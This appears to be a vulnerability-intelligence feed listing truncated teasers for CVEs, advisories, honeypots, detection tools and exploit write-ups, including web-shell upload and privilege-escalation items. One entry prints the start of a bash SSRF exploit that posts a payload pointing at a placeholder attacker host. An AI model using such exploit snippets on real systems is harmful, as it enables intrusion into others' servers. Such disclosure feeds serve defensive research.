CVE-2026-48172

LiteSpeed User-End cPanel Plugin before 2.4.5 allows privilege escalation possibly to root, as exploited in the wild in May 2026. Detection is best done via a command line of grep -rE "cpaneljsonapifunc=redisAble" /var/cpanel/logs /usr/local/cpanel/logs/ 2/dev/null in Bash. If you get no output,...

Smart Contract Security beyond Detection

Smart contract security has progressed from vulnerability detection toward a broader research agenda that includes semantic reasoning, automated repair, adversarial robustness, and real-time exploit detection. This paper develops a capstone-oriented research narrative around four directions:...

EUVD-2020-28415

Malware in sbrugna...

EUVD-2024-31376

Malicious code in bioql PyPI...

Exploit for Deserialization of Untrusted Data in Siemens 6Bk1602-0Aa12-0Tp0_Firmware

Log4Pot A honeypot for the Log4Shell vulnerability CVE-2021-44228. License: GPLv3.0 Features Listen on various ports for Log4Shell exploitation. Detect exploitation in request line and headers. Download exploit payloads recursively. Log to file and Azure blob storage. Usage 1. Install Poetry: cur...

Microsoft Edge (Chromium-Based) Multiple Vulnerabilities (Jun 2025)

Microsoft Edge Chromium-Based is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2025 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

XWiki Standard 14.10 - Remote Code Execution (RCE)

Exploit Title: CVE-2023-48292 Remote Code Execution Exploit Google Dork: N/A Date: 23 March 2025 Exploit Author: Mehran Seifalinia Vendor Homepage: https://www.xwiki.org/ Software Link: https://www.xwiki.org/xwiki/bin/view/Download/ Version: XWiki Standard 14.10 Tested on: Ubuntu 20.04 LTS with...

AVideo 12.4 Code Injection

============================================================================================================================================= | Title : AVideo 12.4 php code injection Vulnerability | | Author : indoushka | | Tested on : windows 10 FrPro / browser : Mozilla firefox 130.0.0 64 bits ...

Exploit for CVE-2024-47177

CUPS Honeypot Overview This project implements a honeypot...

Google Chrome < 126.0.6478.126 Multiple Vulnerabilities

The version of Google Chrome installed on the remote macOS host is prior to 126.0.6478.126. It is, therefore, affected by multiple vulnerabilities as referenced in the 202406stable-channel-update-for-desktop24 advisory. - Use after free in Dawn in Google Chrome prior to 126.0.6478.126 allowed a...

How to track and stop CVE-2024-3400: Palo Alto Networks API Exploit Causing Critical Infrastructure and Enterprise Epidemics

On Friday April 12, Palo Alto disclosed that some versions of PAN-OS are not only vulnerable to remote code execution, but that the vulnerability has been actively exploited to install backdoors on Palo Alto firewalls. A patch is expected to be available on April 14th. The advisory from Palo Alto...

Online Shopping System Advanced - Sql Injection

Exploit Title: Online Shopping System Advanced Date: 07.12.2023 Exploit Author: Furkan Gedik Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced Software Link: https://github.com/PuneethReddyHC/online-shopping-system-advanced Version: 1.0 Tested on: Kali Linux 2020....

HaoKeKeJi YiQiNiu Server-Side Request Forgery

!/bin/bash Set target URL and payload targeturl="http://example.com/application/pay/controller/Api.php" payload="url=http://evil-server.com/exploit" Send the malicious request response=$curl -s -X POST -d "$payload" "$targeturl" Check if the exploit was successful if echo "$response" | grep -q...

VED-eBPF - Kernel Exploit And Rootkit Detection Using eBPF

VED Vault Exploit Defense-eBPF leverages eBPF extended Berkeley Packet Filter to implement runtime kernel security monitoring and exploit detection for Linux systems. Introduction eBPF is an in-kernel virtual machine that allows code execution in the kernel without modifying the kernel source...

Ni Purchase Order(PO) For WooCommerce <= 1.2.1 - Admin+ File Upload to Remote Code Execution

Description The plugin does not validate logo and signature image files uploaded in the settings, allowing high privileged user to upload arbitrary files to the web server, triggering an RCE vulnerability by uploading a web shell. 1. Create a malicious file exploit.php with the contents 2. Visit...

WEBIGniter v28.7.23 File Upload - Remote Code Execution

Title: WEBIGniter v28.7.23 File Upload - Remote Code Execution Author: nu11secur1ty Date: 09/04/2023 Vendor: https://webigniter.net/ Software: https://webigniter.net/demo Reference: https://portswigger.net/web-security/file-upload Description: The media function suffers from file upload...

Exploit for Code Injection in Citrix Netscaler_Application_Delivery_Controller

cve-2023-3519-citrix-scanner This script is a basic Citrix Sc...

User can manipulate totalRewardUnclaimed and steal pool incentives

Lines of code Vulnerability details Impact In the UniswapV3Staker.sol contract, a user can drain the incentives by repeatedly staking and unstaking. Proof of Concept During staking, the stakeToken... function checks that incentives is not zero this would later become insufficient but does not in...

Trend Micro Apex One Security Agent Link Following Local Privilege Escalation Vulnerability

This vulnerability allows local attackers to escalate privileges on affected installations of Trend Micro Apex One Security Agent. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within...

PT-2023-1524 · Trend Micro · Trend Micro Apex One

Name of the Vulnerable Software and Affected Versions: Trend Micro Apex One affected versions not specified Description: A security agent link following issue could allow a local attacker to exploit the vulnerability by changing a specific file into a pseudo-symlink, allowing privilege escalation...